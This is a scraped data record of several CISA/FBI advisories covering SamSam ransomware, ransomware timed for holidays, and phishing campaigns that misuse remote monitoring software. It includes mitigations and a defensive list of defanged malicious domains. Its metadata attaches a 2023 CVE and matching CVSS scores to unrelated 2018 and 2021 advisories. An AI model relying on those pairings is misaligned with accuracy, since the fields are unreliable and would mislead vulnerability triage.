When external access to internal resources is required, use secure methods such as VPNs. Of course, VPNs are only as secure as the connected devices.\n * Restrict users' ability (permissions) to install and run unwanted software applications.\n * Scan for and remove suspicious email attachments; ensure the scanned attachment is its \"true file type\" (i.e., the extension matches the file header).\n * Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.\n\nAdditional information on malware incident prevention and handling can be found in Special Publication 800-83, _Guide to Malware Incident Prevention and Handling for Desktops and Laptops_, from the National Institute of Standards and Technology.[[1]](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-83r1.pdf>)\n\n### Contact Information\n\nTo report an intrusion and request resources for incident response or technical assistance, contact NCCIC, FBI, or the FBI\u2019s Cyber Division via the following information:\n\n * NCCIC \n * [NCCICCustomerService@hq.dhs.gov](<mailto:NCCICCustomerService@hq.dhs.gov>)\n * 888-282-0870\n * FBI\u2019s Cyber Division \n * [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>)\n * 855-292-3937\n * FBI through a local field office\n\n### Feedback\n\nDHS strives to make this report a valuable tool for our partners and welcomes feedback on how this publication could be improved. 
You can help by answering a few short questions about this report at the following URL: https://www.us-cert.gov/forms/feedback.\n\n### References\n\n[[1] NIST SP 800-83: Guide to Malware Incident Prevention and Handling for Desktops and Laptops](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-83r1.pdf>)\n\n### Revisions\n\nDecember 3, 2018: Initial version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-12-03T12:00:00", "type": "ics", "title": "SamSam Ransomware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2018-12-03T12:00:00", "id": "AA18-337A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa18-337a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T12:59:30", "description": "### Summary\n\n_**Immediate Actions You Can Take Now to Protect Against Ransomware** \n\u2022 Make an [offline backup ](<https://cisa.gov/sites/default/files/publications/Cyber Essentials Toolkit 5 20201015_508.pdf>)of your data. 
\n\u2022 Do not click on [suspicious links](<https://us-cert.cisa.gov/ncas/tips/ST04-014>). \n\u2022 If you use [RDP](<https://www.ic3.gov/Media/Y2018/PSA180927>), secure and monitor it. \n\u2022 [Update](<https://us-cert.cisa.gov/ncas/tips/ST04-006>) your OS and software. \n\u2022 Use [strong passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>). \n\u2022 Use [multi-factor authentication](<https://us-cert.cisa.gov/ncas/tips/ST05-012>)._\n\nThe Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) have observed an increase in highly impactful ransomware attacks occurring on holidays and weekends\u2014when offices are normally closed\u2014in the United States, as recently as the Fourth of July holiday in 2021. The FBI and CISA do not currently have any specific threat reporting indicating a cyberattack will occur over the upcoming Labor Day holiday. However, the FBI and CISA are sharing the below information to provide awareness to be especially diligent in your network defense practices in the run up to holidays and weekends, based on recent actor tactics, techniques, and procedures (TTPs) and cyberattacks over holidays and weekends during the past few months. The FBI and CISA encourage all entities to examine their current cybersecurity posture and implement the recommended best practices and mitigations to manage the risk posed by all cyber threats, including ransomware.\n\n### Threat Overview\n\n#### **Recent Holiday Targeting**\n\nCyber actors have conducted increasingly impactful attacks against U.S. entities on or around holiday weekends over the last several months. The FBI and CISA do not currently have specific information regarding cyber threats coinciding with upcoming holidays and weekends. 
Cyber criminals, however, may view holidays and weekends\u2014especially holiday weekends\u2014as attractive timeframes in which to target potential victims, including small and large businesses. In some cases, this tactic provides a head start for malicious actors conducting network exploitation and follow-on propagation of ransomware, as network defenders and IT support of victim organizations are at limited capacity for an extended time.\n\n * In May 2021, leading into Mother\u2019s Day weekend, malicious cyber actors deployed DarkSide ransomware against the IT network of a U.S.-based critical infrastructure entity in the Energy Sector, resulting in a week-long suspension of operations. After DarkSide actors gained access to the victim\u2019s network, they deployed ransomware to encrypt victim data and\u2014as a secondary form of extortion\u2014exfiltrated the data before threatening to publish it to further pressure victims into paying the ransom demand.\n * In May 2021, over the Memorial Day weekend, a critical infrastructure entity in the Food and Agricultural Sector suffered a Sodinokibi/REvil ransomware attack affecting U.S. and Australian meat production facilities, resulting in a complete production stoppage.\n * In July 2021, during the Fourth of July holiday weekend, Sodinokibi/REvil ransomware actors attacked a U.S.-based critical infrastructure entity in the IT Sector and implementations of their remote monitoring and management tool, affecting hundreds of organizations\u2014including multiple managed service providers and their customers.\n\n#### **Ransomware Trends**\n\nThe FBI's Internet Crime Complaint Center (IC3), which provides the public with a trustworthy source for reporting information on cyber incidents, received 791,790 complaints for all types of internet crime\u2014a record number\u2014from the American public in 2020, with reported losses exceeding $4.1 billion. This represents a 69 percent increase in total complaints from 2019. 
The number of ransomware incidents also continues to rise, with 2,474 incidents reported in 2020, representing a 20 percent increase in the number of incidents, and a 225 percent increase in ransom demands. From January to July 31, 2021, the IC3 has received 2,084 ransomware complaints with over $16.8M in losses, a 62 percent increase in reporting and 20 percent increase in reported losses compared to the same time frame in 2020. This number includes only those victims who have provided information to IC3. The following ransomware variants have been the most frequently reported to FBI in attacks over the last month.\n\n * Conti\n * PYSA\n * LockBit\n * RansomEXX/Defray777\n * Zeppelin\n * Crysis/Dharma/Phobos\n\nThe destructive impact of ransomware continues to evolve beyond encryption of IT assets. Cyber criminals have increasingly targeted large, lucrative organizations and providers of critical services with the expectation of higher value ransoms and increased likelihood of payments. Cyber criminals have also increasingly coupled initial encryption of data with a secondary form of extortion, in which they threaten to publicly name affected victims and release sensitive or proprietary data exfiltrated before encryption, to further encourage payment of ransom. (See CISA\u2019s Fact Sheet: [Protecting Sensitive and Personal Information from Ransomware-Caused Data Breaches](<https://www.cisa.gov/publication/protecting-sensitive-and-personal-information>).) Malicious actors have also added tactics, such as encrypting or deleting system backups\u2014making restoration and recovery more difficult or infeasible for impacted organizations.\n\nAlthough cyber criminals use a variety of techniques to infect victims with ransomware, the two most prevalent initial access vectors are phishing and brute forcing unsecured remote desktop protocol (RDP) endpoints. 
Additional common means of initial infection include deployment of precursor or dropper malware; exploitation of software or operating system vulnerabilities; exploitation of managed service providers with access to customer networks; and the use of valid, stolen credentials, such as those purchased on the dark web. Precursor malware enables cyber actors to conduct reconnaissance on victim networks, steal credentials, escalate privileges, exfiltrate information, move laterally on the victim network, and obfuscate command-and-control communications. Cyber actors use this access to: \n\n * Evaluate a victim\u2019s ability to pay a ransom.\n * Evaluate a victim\u2019s incentive to pay a ransom to: \n * Regain access to their data and/or \n * Avoid having their sensitive or proprietary data publicly leaked.\n * Gather information for follow-on attacks before deploying ransomware on the victim network.\n\n### Threat Hunting\n\nThe FBI and CISA suggest organizations engage in preemptive threat hunting on their networks. Threat hunting is a proactive strategy to search for signs of threat actor activity to prevent attacks before they occur or to minimize damage in the event of a successful attack. Threat actors can be present on a victim network long before they lock down a system, alerting the victim to the ransomware attack. Threat actors often search through a network to find and compromise the most critical or lucrative targets. Many will exfiltrate large amounts of data. Threat hunting encompasses the following elements of understanding the IT environment by developing a baseline through a behavior-based analytics approach, evaluating data logs, and installing automated alerting systems. \n\n * **Understand the IT environment\u2019s routine activity and architecture by establishing a baseline.** By implementing a behavior-based analytics approach, an organization can better assess user, endpoint, and network activity patterns. 
This approach can help an organization remain alert on deviations from normal activity and detect anomalies. Understanding when users log in to the network\u2014and from what location\u2014can assist in identifying anomalies. Understanding the baseline environment\u2014including the normal internal and external traffic\u2014can also help in detecting anomalies. Suspicious traffic patterns are usually the first indicators of a network incident but cannot be detected without establishing a baseline for the corporate network.\n * **Review data logs.** Understand what standard performance looks like in comparison to suspicious or anomalous activity. Things to look for include: \n * Numerous failed file modifications,\n * Increased CPU and disk activity,\n * Inability to access certain files, and\n * Unusual network communications.\n * **Employ intrusion prevention systems and automated security alerting systems**\u2014such as security information event management software, intrusion detection systems, and endpoint detection and response.\n * **Deploy honeytokens** and alert on their usage to detect lateral movement.\n\nIndicators of suspicious activity that threat hunters should look for include:\n\n * Unusual inbound and outbound network traffic,\n * Compromise of administrator privileges or escalation of the permissions on an account,\n * Theft of login and password credentials,\n * Substantial increase in database read volume,\n * Geographical irregularities in access and log in patterns,\n * Attempted user activity during anomalous logon times, \n * Attempts to access folders on a server that are not linked to the HTML within the pages of the web server, and\n * Baseline deviations in the type of outbound encrypted traffic since advanced persistent threat actors frequently encrypt exfiltration.\n\nSee the joint advisory from Australia, Canada, New Zealand, the United Kingdom, and the United States on [Technical Approaches to Uncovering and Remediating Malicious 
Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) for additional guidance on hunting or investigating a network, and for common mistakes in incident handling. Also review the Ransomware Response Checklist in the [CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide](<https://www.cisa.gov/stopransomware/ransomware-guide>).\n\n#### **Cyber Hygiene Services**\n\nCISA offers a range of no-cost [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>)\u2014including vulnerability scanning and ransomware readiness assessments\u2014to help critical infrastructure organizations assess, identify, and reduce their exposure to cyber threats. By taking advantage of these services, organizations of any size will receive recommendations on ways to reduce their risk and mitigate attack vectors. \n\n### Ransomware Best Practices\n\nThe FBI and CISA strongly discourage paying a ransom to criminal actors. Payment does not guarantee files will be recovered, nor does it ensure protection from future breaches. Payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of malware, and/or fund illicit activities. Regardless of whether you or your organization decide to pay the ransom, the FBI and CISA urge you to report ransomware incidents to [CISA](<https://us-cert.cisa.gov/report>), a [local FBI field office](<https://www.fbi.gov/contact-us/field-offices>), or by [filing a report with IC3](<https://www.ic3.gov/Home/FileComplaint>) at [IC3.gov](<https://www.ic3.gov/>). Doing so provides the U.S. Government with critical information needed to help victims, track ransomware attackers, hold attackers accountable under U.S. 
law, and share information to prevent future attacks.\n\n#### **Information Requested**\n\nUpon receiving an incident report, the FBI or CISA may seek forensic artifacts, to the extent that affected entities determine such information can be legally shared, including: \n\n * Recovered executable file(s),\n * Live memory (RAM) capture,\n * Images of infected systems,\n * Malware samples, and\n * Ransom note.\n\n### Recommended Mitigations\n\nThe FBI and CISA highly recommend organizations continuously and actively monitor for ransomware threats over holidays and weekends.FBI and CISA highly recommend IT security personnel subscribe to CISA cybersecurity publications (https://public.govdelivery.com/accounts/USDHSCISA/subscriber/new?qsp=CODE_RED)\u2014and regularly visit the FBI Internet Crime Complaint Center (https://www.ic3.gov/)\u2014for the latest alerts. Additionally, the FBI and CISA recommend identifying IT security employees to be available and \"on call\" during these times, in the event of a ransomware attack. The FBI and CISA also suggest applying the following network best practices to reduce the risk and impact of compromise.\n\n#### **Make an offline backup of your data.**\n\n * Make and maintain offline, encrypted backups of data and regularly test your backups. Backup procedures should be conducted on a regular basis. 
It is important that backups be maintained offline as many ransomware variants attempt to find and delete or encrypt accessible backups.\n * Review your organization's backup schedule to take into account the risk of a possible disruption to backup processes during weekends or holidays.\n\n#### **Do not click on suspicious links.**\n\n * Implement a user training program and phishing exercises to raise awareness among users about the risks involved in visiting malicious websites or opening malicious attachments and to reinforce the appropriate user response to phishing and spearphishing emails.\n\n#### **If you use RDP\u2014or other potentially risky services\u2014secure and monitor.**\n\n * Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources and require MFA. If RDP must be available externally, it should be authenticated via VPN.\n * Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts, log RDP login attempts, and disable unused remote access/RDP ports.\n * Ensure devices are properly configured and that security features are enabled. Disable ports and protocols that are not being used for a business purpose (e.g., RDP Transmission Control Protocol Port 3389). \n * Disable or block Server Message Block (SMB) protocol outbound and remove or disable outdated versions of SMB. Threat actors use SMB to propagate malware across organizations.\n * Review the security posture of third-party vendors and those interconnected with your organization. 
Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.\n * Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs under an established security policy.\n * Open document readers in protected viewing modes to help prevent active content from running.\n\n#### **Update your OS and software; scan for vulnerabilities.**\n\n * Upgrade software and operating systems that are no longer supported by vendors to currently supported versions. Regularly patch and update software to the latest available versions. Prioritize timely patching of internet-facing servers\u2014as well as software processing internet data, such as web browsers, browser plugins, and document readers\u2014for known vulnerabilities. Consider using a centralized patch management system; use a risk-based assessment strategy to determine which network assets and zones should participate in the patch management program.\n * Automatically update antivirus and anti-malware solutions and conduct regular virus and malware scans.\n * Conduct regular vulnerability scanning to identify and address vulnerabilities, especially those on internet-facing devices. (See the Cyber Hygiene Services section above for more information on CISA\u2019s free services.)\n\n#### **Use strong passwords.**\n\n * Ensure [strong passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>) and challenge responses. Passwords should not be reused across multiple accounts or stored on the system where an adversary may have access.\n\n#### **Use multi-factor authentication.**\n\n * Require [multi-factor authentication ](<https://media.defense.gov/2020/Sep/22/2002502665/-1/-1/0/Multifactor_Authentication_Solutions_UOO17091520_V1.1 - Copy.PDF>)(MFA) for all services to the extent possible, particularly for remote access, virtual private networks, and accounts that access critical systems. 

#### **Secure your network(s): implement segmentation, filter traffic, and scan ports.**

 * Implement network segmentation with multiple layers, with the most critical communications occurring in the most secure and reliable layer.
 * Filter network traffic to prohibit ingress and egress communications with known malicious IP addresses. Prevent users from accessing malicious websites by implementing URL blocklists and/or allowlists.
 * Scan the network for open and listening ports and close those that are unnecessary.
 * For companies with employees working remotely, secure home networks—including computing, entertainment, and Internet of Things devices—to prevent a cyberattack; use separate devices for separate activities; and do not exchange home and work content.

#### **Secure your user accounts.**

 * Regularly audit administrative user accounts and configure access controls under the principles of least privilege and separation of duties.
 * Regularly audit logs to ensure new accounts are legitimate users.

#### **Have an incident response plan.**

 * Create, maintain, and exercise a basic cyber incident response plan that:
   * Includes procedures for response and notification in a ransomware incident and
   * Plans for the possibility of critical systems being inaccessible for a period of time.

**Note:** for help with developing your plan, review available incident response guidance, such as the [Public Power Cyber Incident Response Playbook](<https://www.publicpower.org/system/files/documents/Public-Power-Cyber-Incident-Response-Playbook.pdf>) and the Ransomware Response Checklist in the [CISA-MS-ISAC Joint Ransomware Guide](<https://cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware Guide_S508C_.pdf>).

#### **Use the Ransomware Response Checklist in case of infection.**

If your organization is impacted by a ransomware incident, the FBI and CISA recommend the following actions.

 * Follow the Ransomware Response Checklist on p. 11 of the [CISA-MS-ISAC Joint Ransomware Guide](<https://cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware Guide_S508C_.pdf>).
 * Scan your backups. If possible, scan your backup data with an antivirus program to check that it is free of malware.

### Additional Resources

For additional resources related to the prevention and mitigation of ransomware, go to [https://www.stopransomware.gov](<https://www.stopransomware.gov/>) as well as the [CISA-MS-ISAC Joint Ransomware Guide](<https://cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware Guide_S508C_.pdf>). Stopransomware.gov is the U.S. Government’s new, official one-stop location for resources to tackle ransomware more effectively. Additional resources include:

 * CISA Insights: [Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses](<https://www.cisa.gov/sites/default/files/publications/CISA Insights_Guidance-for-MSPs-and-Small-and-Mid-sized-Businesses_S508C.pdf>)
 * CISA: [Cyber Essentials](<https://www.cisa.gov/cyber-essentials>)
 * NIST SP 800-83 Rev. 1: [Guide to Malware Incident Prevention and Handling for Desktops and Laptops](<https://csrc.nist.gov/publications/detail/sp/800-83/rev-1/final>)
 * NIST SP 800-46 Rev. 2: [Guide to Enterprise Telework, Remote Access, and Bring Your Own Device (BYOD) Security](<https://csrc.nist.gov/publications/detail/sp/800-46/rev-2/final>)

### Contact Information

To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. If you have any further questions related to this Joint Cybersecurity Advisory, or to request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.gov](<mailto:Central@cisa.gov>).

### Revisions

 * August 31, 2021: Initial Version
 * September 2, 2021: Updated mitigations to better align with Ransomware Response Checklist.
 * February 10, 2022: Updated broken URL

", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2022-02-10T12:00:00", "type": "ics", "title": "Ransomware Awareness for Holidays and Weekends", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2022-02-10T12:00:00", "id": "AA21-243A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-243a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}},
{"lastseen": "2023-12-06T12:50:35", "description": "
### Summary

The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Multi-State Information Sharing and Analysis Center (MS-ISAC) (hereafter referred to as the “authoring organizations”) are releasing this joint Cybersecurity Advisory (CSA) to warn network defenders about malicious use of legitimate remote monitoring and management (RMM) software. In October 2022, CISA identified a widespread cyber campaign involving the malicious use of legitimate RMM software. Specifically, cyber criminal actors sent phishing emails that led to the download of legitimate RMM software—ScreenConnect (now ConnectWise Control) and AnyDesk—which the actors used in a refund scam to steal money from victim bank accounts.

Although this campaign appears financially motivated, the authoring organizations assess it could lead to additional types of malicious activity. For example, the actors could sell victim account access to other cyber criminal or advanced persistent threat (APT) actors. This campaign highlights the threat of malicious cyber activity associated with legitimate RMM software: after gaining access to the target network via phishing or other techniques, malicious cyber actors—from cybercriminals to nation-state sponsored APTs—are known to use legitimate RMM software as a backdoor for persistence and/or command and control (C2).

Using portable executables of RMM software provides a way for actors to establish local user access without the need for administrative privilege and full software installation—effectively bypassing common software controls and risk management assumptions.

The authoring organizations strongly encourage network defenders to review the Indicators of Compromise (IOCs) and Mitigations sections in this CSA and apply the recommendations to protect against malicious use of legitimate RMM software.

Download the PDF version of this report: pdf, 608 kb.

For a downloadable copy of IOCs, see AA23-025.stix (STIX, 19 kb).

### Technical Details

#### **Overview**

In October 2022, CISA used trusted third-party reporting to conduct retrospective analysis of [EINSTEIN](<https://www.cisa.gov/einstein>)—a federal civilian executive branch (FCEB)-wide intrusion detection system (IDS) operated and monitored by CISA—and identified suspected malicious activity on two FCEB networks:

 * In mid-June 2022, malicious actors sent a phishing email containing a phone number to an FCEB employee’s government email address. The employee called the number, which led them to visit the malicious domain, myhelpcare[.]online.
 * In mid-September 2022, there was bi-directional traffic between an FCEB network and myhelpcare[.]cc.

Based on further EINSTEIN analysis and incident response support, CISA identified related activity on many other FCEB networks. The authoring organizations assess this activity is part of a widespread, financially motivated phishing campaign and is related to malicious typosquatting activity reported by Silent Push in the blog post [Silent Push uncovers a large trojan operation featuring Amazon, Microsoft, Geek Squad, McAfee, Norton, and Paypal domains](<https://www.silentpush.com/blog/silent-push-uncovers-a-large-phishing-operation-featuring-amazon-geek-squad-mcafee-microsoft-norton-and-paypal-domains>).

#### **Malicious Cyber Activity**

The authoring organizations assess that since at least June 2022, cyber criminal actors have sent help desk-themed phishing emails to FCEB federal staff’s personal and government email addresses. The emails either contain a link to a “first-stage” malicious domain or prompt the recipients to call the cybercriminals, who then try to convince the recipients to visit the first-stage malicious domain. See figure 1 for an example phishing email obtained from an FCEB network.

_Figure 1: Help desk-themed phishing email example_

The recipient visiting the first-stage malicious domain triggers the download of an executable. The executable then connects to a “second-stage” malicious domain, from which it downloads additional RMM software.

CISA noted that the actors did not install downloaded RMM clients on the compromised host. Instead, the actors downloaded AnyDesk and ScreenConnect as self-contained, portable executables configured to connect to the actor’s RMM server.

**Note:** Portable executables launch within the user’s context without installation. Because portable executables do not require administrator privileges, they can allow execution of unapproved software even if a risk management control may be in place to audit or block the same software’s installation on the network. Threat actors can leverage a portable executable with local user rights to attack other vulnerable machines within the local intranet or establish long term persistent access as a local user service.

CISA has observed that multiple first-stage domain names follow naming patterns used for IT help/support themed social-engineering (e.g., hservice[.]live, gscare[.]live, nhelpcare[.]info, deskcareme[.]live, nhelpcare[.]cc). According to Silent Push, some of these malicious domains impersonate known brands such as Norton, GeekSupport, Geek Squad, Amazon, Microsoft, McAfee, and PayPal.[[1](<https://www.silentpush.com/blog/silent-push-uncovers-a-large-phishing-operation-featuring-amazon-geek-squad-mcafee-microsoft-norton-and-paypal-domains>)] CISA has also observed that the first-stage malicious domain linked in the initial phishing email periodically redirects to other sites for additional redirects and downloads of RMM software.

#### **Use of Remote Monitoring and Management Tools**

In this campaign, after downloading the RMM software, the actors used the software to initiate a refund scam. They first connected to the recipient’s system and enticed the recipient to log into their bank account while remaining connected to the system. The actors then used their access through the RMM software to modify the recipient’s bank account summary. The falsely modified bank account summary showed the recipient was mistakenly refunded an excess amount of money. The actors then instructed the recipient to “refund” this excess amount to the scam operator.

Although this specific activity appears to be financially motivated and targets individuals, the access could lead to additional malicious activity against the recipient’s organization—from both other cybercriminals and APT actors.
Network defenders should be aware that:

 * Although the cybercriminal actors in this campaign used ScreenConnect and AnyDesk, threat actors can maliciously leverage any legitimate RMM software.
 * Because threat actors can download legitimate RMM software as self-contained, portable executables, they can bypass both administrative privilege requirements and software management control policies.
 * The use of RMM software generally does not trigger antivirus or antimalware defenses.
 * Malicious cyber actors are known to leverage legitimate RMM and remote desktop software as backdoors for persistence and for C2.[[2](<https://www.cisa.gov/uscert/ncas/alerts/aa22-277a>)],[[3](<https://www.cisa.gov/uscert/ncas/alerts/aa22-055a>)],[[4](<https://www.cisa.gov/uscert/ncas/alerts/aa22-152a>)],[[5](<https://www.cisa.gov/uscert/ncas/alerts/aa21-042a>)],[[6](<https://www.cisa.gov/uscert/ncas/alerts/aa20-301a>)],[[7](<https://www.cisa.gov/uscert/ncas/alerts/aa20-107a>)],[[8](<https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-public-to-beware-of-tech-support-scammers-targeting-financial-accounts-using-remote-desktop-software>)]
 * RMM software allows cyber threat actors to avoid using custom malware.

Threat actors often target legitimate users of RMM software. Targets can include managed service providers (MSPs) and IT help desks, who regularly use legitimate RMM software for technical and security end-user support, network management, endpoint monitoring, and to interact remotely with hosts for IT-support functions. These threat actors can exploit trust relationships in MSP networks and gain access to a large number of the victim MSP's customers. MSP compromises can introduce significant risk—such as [ransomware](<https://www.cisa.gov/uscert/kaseya-ransomware-attack>) and [cyber espionage](<https://cisa.gov/uscert/sites/default/files/publications/Chinese-Cyber-Activity-Targeting-Managed-Service-Providers.pdf>)—to the MSP’s customers.

The authoring organizations strongly encourage network defenders to apply the recommendations in the Mitigations section of this CSA to protect against malicious use of legitimate RMM software.

### **INDICATORS OF COMPROMISE**

See table 1 for IOCs associated with the campaign detailed in this CSA.

_Table 1: Malicious Domains and IP addresses observed by CISA_

| **Domain** | **Description** | **Date(s) Observed** |
|---|---|---|
| win03[.]xyz | Suspected first-stage malware domain | June 1, 2022; July 19, 2022 |
| myhelpcare[.]online | Suspected first-stage malware domain | June 14, 2022 |
| win01[.]xyz | Suspected first-stage malware domain | August 3, 2022; August 18, 2022 |
| myhelpcare[.]cc | Suspected first-stage malware domain | September 14, 2022 |
| 247secure[.]us | Second-stage malicious domain | October 19, 2022; November 10, 2022 |

Additional resources to detect possible exploitation or compromise:

 * Silent Push: [Silent Push uncovers a large trojan operation featuring Amazon, Microsoft, Geek Squad, McAfee, Norton, and Paypal domains](<https://www.silentpush.com/blog/silent-push-uncovers-a-large-phishing-operation-featuring-amazon-geek-squad-mcafee-microsoft-norton-and-paypal-domains>).

### Mitigations

The authoring organizations encourage network defenders to:

 * Implement best practices to block phishing emails. See [CISA’s Phishing Infographic](<https://cisa.gov/sites/default/files/publications/phishing-infographic-508c.pdf>) for more information.
 * Audit remote access tools on your network to identify currently used and/or authorized RMM software.
 * Review logs for execution of RMM software to detect abnormal use of programs running as a portable executable.
 * Use security software to detect instances of RMM software only being loaded in memory.
 * Implement application controls to manage and control execution of software, including allowlisting RMM programs.
   * See NSA Cybersecurity Information sheet [Enforce Signed Software Execution Policies](<https://media.defense.gov/2019/Sep/09/2002180334/-1/-1/0/Enforce%20Signed%20Software%20Execution%20Policies%20-%20Copy.pdf>).
   * Application controls should prevent both installation and execution of portable versions of unauthorized RMM software.
 * Require authorized RMM solutions only be used from within your network over approved remote access solutions, such as virtual private networks (VPNs) or virtual desktop interfaces (VDIs).
 * Block both inbound and outbound connections on common RMM ports and protocols at the network perimeter.
 * Implement a user training program and phishing exercises to raise awareness among users about the risks of visiting suspicious websites, clicking on suspicious links, and opening suspicious attachments. Reinforce the appropriate user response to phishing and spearphishing emails.

### **RESOURCES**

 * See CISA Insights [Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses](<https://cisa.gov/sites/default/files/publications/CISA%20Insights_Guidance-for-MSPs-and-Small-and-Mid-sized-Businesses_S508C.pdf>) for guidance on hardening MSP and customer infrastructure.
 * U.S. Defense Industrial Base (DIB) Sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System (PDNS) services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email [dib_defense@cyber.nsa.gov](<mailto:dib_defense@cyber.nsa.gov>).
 * CISA offers vulnerability scanning services to help organizations reduce their exposure to threats by taking a proactive approach to mitigating attack vectors. See [cisa.gov/cyber-hygiene-services](<https://www.cisa.gov/cyber-hygiene-services>).
 * Consider participating in CISA’s [Automated Indicator Sharing (AIS)](<https://www.cisa.gov/ais>) to receive real-time exchange of machine-readable cyber threat indicators and defensive measures. AIS is offered at no cost to participants as part of CISA’s mission to work with our public and private sector partners to identify and help mitigate cyber threats through information sharing and provide technical assistance, upon request, that helps prevent, detect, and respond to incidents.

### **PURPOSE**

This advisory was developed by CISA, NSA, and MS-ISAC in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.

### **DISCLAIMER**

The information in this report is being provided “as is” for informational purposes only. CISA, NSA, and MS-ISAC do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.

### References

[[1] Silent Push uncovers a large trojan operation featuring Amazon, Microsoft, Geek Squad, McAfee, Norton, and Paypal domains — Silent Push Threat Intelligence](<https://www.silentpush.com/blog/silent-push-uncovers-a-large-phishing-operation-featuring-amazon-geek-squad-mcafee-microsoft-norton-and-paypal-domains>)

[[2] Impacket and Exfiltration Tool Used to Steal Sensitive Information from Defense Industrial Base Organization | CISA](<https://www.cisa.gov/uscert/ncas/alerts/aa22-277a>)

[[3] Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks | CISA](<https://www.cisa.gov/uscert/ncas/alerts/aa22-055a>)

[[4] Karakurt Data Extortion Group | CISA](<https://www.cisa.gov/uscert/ncas/alerts/aa22-152a>)

[[5] Compromise of U.S. Water Treatment Facility | CISA](<https://www.cisa.gov/uscert/ncas/alerts/aa21-042a>)

[[6] North Korean Advanced Persistent Threat Focus: Kimsuky | CISA](<https://www.cisa.gov/uscert/ncas/alerts/aa20-301a>)

[[7] Continued Threat Actor Exploitation Post Pulse Secure VPN Patching | CISA](<https://www.cisa.gov/uscert/ncas/alerts/aa20-107a>)

[[8] FBI Warns Public to Beware of Tech Support Scammers Targeting Financial Accounts Using Remote Desktop Software — FBI](<https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-public-to-beware-of-tech-support-scammers-targeting-financial-accounts-using-remote-desktop-software>)

### Revisions

 * January 25, 2023: Initial Version

